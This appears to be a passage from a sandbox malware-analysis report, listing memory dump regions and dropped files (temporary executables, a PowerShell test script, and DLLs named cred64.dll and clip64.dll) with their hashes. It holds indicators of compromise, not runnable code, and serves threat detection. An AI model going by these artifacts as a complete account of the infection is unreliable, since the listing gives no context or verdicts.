SHA256 cee74fad9d775323a5843d9e55c770314e8b58ec08653c7b2ce8e8049df42bb5
SHA512 ea598fb8bfe15c777daeb025da98674fe8652f7341e5d150d188c46744fce11c4d20d1686d185039c5025c9a4252d1585686b1c3a4df4252e69675aaf37edfc1

memory/3124-244-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/860-252-0x0000000074890000-0x0000000075040000-memory.dmp

memory/3124-253-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4d25fc6e43a16159ebfd161f28e16ef7
SHA1 49941a4bc3ed1ef90c7bcf1a8f0731c6a68facb4
SHA256 cee74fad9d775323a5843d9e55c770314e8b58ec08653c7b2ce8e8049df42bb5
SHA512 ea598fb8bfe15c777daeb025da98674fe8652f7341e5d150d188c46744fce11c4d20d1686d185039c5025c9a4252d1585686b1c3a4df4252e69675aaf37edfc1

memory/3124-248-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/60-271-0x0000000007230000-0x0000000007240000-memory.dmp

memory/3124-273-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/860-274-0x0000000005430000-0x0000000005440000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3af151bb6b62375e1879cddca2c676f2
SHA1 a3ac4516798834d7db0010adf3d1633e693c91db
SHA256 5a5ba8240911b265864fd09a23043132b9d7e669fdf3e27e77cc98339469a765
SHA512 430bcff4e2b2e2e9fde7764ba6f0d87c65db79ee943a7babe24eae57c262c07df1884603e697b1f3172dc2c76f2e84a8b1a8bde3053082e5830c3f5f50782f32

memory/3124-275-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

\??\pipe\LOCAL\crashpad_1524_GAJXVPJZXVXJRGBK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3124-272-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/3124-255-0x0000000007570000-0x0000000007580000-memory.dmp

memory/3124-254-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/3124-277-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\83BC.exe

MD5 85fb3b5dffede43c9eb9510b19e440b4
SHA1 6623493bbc3dd0fb63b8b8740b22d682e91204b1
SHA256 3bf78815615306ad4be27fad0bad2a6415b55ae781d104028772c3975586b53a
SHA512 af5779b355968f6a1c08be001434135d1d8fdec6b25cab97ec27cd4ee5f0ce5211082349db6ea2c75edfd17a82677a026f918b2cfe1094ca2d9041cfedd0ad40

memory/3124-281-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\83BC.exe

MD5 85fb3b5dffede43c9eb9510b19e440b4
SHA1 6623493bbc3dd0fb63b8b8740b22d682e91204b1
SHA256 3bf78815615306ad4be27fad0bad2a6415b55ae781d104028772c3975586b53a
SHA512 af5779b355968f6a1c08be001434135d1d8fdec6b25cab97ec27cd4ee5f0ce5211082349db6ea2c75edfd17a82677a026f918b2cfe1094ca2d9041cfedd0ad40

memory/2288-283-0x0000000074890000-0x0000000075040000-memory.dmp

memory/3124-284-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/3124-287-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/5064-288-0x00000000007E0000-0x00000000011E2000-memory.dmp

memory/3124-292-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/3124-297-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4d25fc6e43a16159ebfd161f28e16ef7
SHA1 49941a4bc3ed1ef90c7bcf1a8f0731c6a68facb4
SHA256 cee74fad9d775323a5843d9e55c770314e8b58ec08653c7b2ce8e8049df42bb5
SHA512 ea598fb8bfe15c777daeb025da98674fe8652f7341e5d150d188c46744fce11c4d20d1686d185039c5025c9a4252d1585686b1c3a4df4252e69675aaf37edfc1

memory/5064-298-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8BBC.exe

MD5 42d97769a8cfdfedac8e03f6903e076b
SHA1 01c6791e564bdbc0e7c6e2fdbdf4fdadc010ffbe
SHA256 f9670a844453e56898ed4c23afe57dfa2cd20f28ae8e97df4c7304371e1b179b
SHA512 38d2ae5ded48543d8ceb4c4a2a7ebd3287c4b720fe4133080f64e9ebd4403e8ee66301885c20164c9b4fb48536a107fd21f03689332685fcd3214075feadbd77

memory/3124-290-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/3124-286-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 34d2ddcc485e09422987ab4773546596
SHA1 ff076124ed2267a1f60a0f730dd50e68a62cb9e0
SHA256 d2d75c71f6a35fb82349b1b10512efc612e9ba8eb23cb9563cb7b76ec734fa08
SHA512 dbae5e1b4b895a5844dfbbf7d6ad1d5d178809e35ce97d792a417416334be87a5e57b4b13f6c0df924f5c47851adffaecac1b689a73cb303316579962da934ee

memory/2288-305-0x00000000079C0000-0x00000000079D0000-memory.dmp

memory/3124-304-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/3124-321-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/3124-322-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9A63.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

memory/3124-328-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9A63.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 e5bbfaa96a70b5c2316d1befe5a1b85c
SHA1 399a478e94abf553332d11c18b9f88894ecaeabe
SHA256 b9cdd487fdc7773bcf203bbca8704b57f653c01d413d48c4752dbc868be3fb30
SHA512 bbbac2e91e289a0d8ca23f372577a8f7ce602981b5f4347a314ec185cbdfff2115e39e5c1f72dda704f098157e3b3bde9621db38ecad5c3e99ec189b89358450

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4d25fc6e43a16159ebfd161f28e16ef7
SHA1 49941a4bc3ed1ef90c7bcf1a8f0731c6a68facb4
SHA256 cee74fad9d775323a5843d9e55c770314e8b58ec08653c7b2ce8e8049df42bb5
SHA512 ea598fb8bfe15c777daeb025da98674fe8652f7341e5d150d188c46744fce11c4d20d1686d185039c5025c9a4252d1585686b1c3a4df4252e69675aaf37edfc1

memory/2132-325-0x0000000074890000-0x0000000075040000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 0bce2fed456a72a2486b1d17621c88d6
SHA1 4cbff382f76920526ec0bc81a05bfd372dd88229
SHA256 09d0729bea75ff6d7c859ccfc3ef3c2797b65b51f8de8ed7fe5933cde93c778b
SHA512 74c7acefa56cad28b8a503ffe65ec78ea44f16d2ace99b40ef357e4142b89703e20f35062782bcab5d3b602d65206a0689e054dbd9cb19cf5be499627346e1a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 45e0fd964935f8e3e1c2155e830b146c
SHA1 65383605b3ac81812e1a754b0e7caf423294830f
SHA256 ff0f4a66c9656b89aebed494934bbe6c2195797860700ff2cc7ebdef67676a46
SHA512 f4b480b5f27f99cc6d177b3b13eb470a8bfc58c127ffb0ec479825cadfccfe6d14194d258a65845ce79a67c687e78ae0e8bd1d3f9baa743ceb4d70c5a4ad3b79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d4842e6b6d6291a38625cfaad4cdfc8c
SHA1 52012794224ac62ebe7935da348aae09e24828bd
SHA256 193c7e83dbf4e6e896677009df2637b157b75f39b0c832bbea050bf5bd401bc5
SHA512 d54e50c6b87b102ba64fc4d42f904e37b349dfc77b53d2ef7da90d2c9f82dea7d15319a8428f0e413c517d5081f0d5a134c1a6e04dbc54548e13c29758e12553

memory/1152-368-0x00000000001C0000-0x00000000001DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 d555d038867542dfb2fb0575a0d3174e
SHA1 1a5868d6df0b5de26cf3fc7310b628ce0a3726f0
SHA256 044cac379dddf0c21b8e7ee4079d21c67e28795d14e678dbf3e35900f25a1e2e
SHA512 d8220966fe6c3ae4499bc95ab3aead087a3dd915853320648849d2fc123a4acd157b7dba64af0108802522575a822651ecc005523c731423d9131ee679c2712f

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vfqpbuhz.znq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4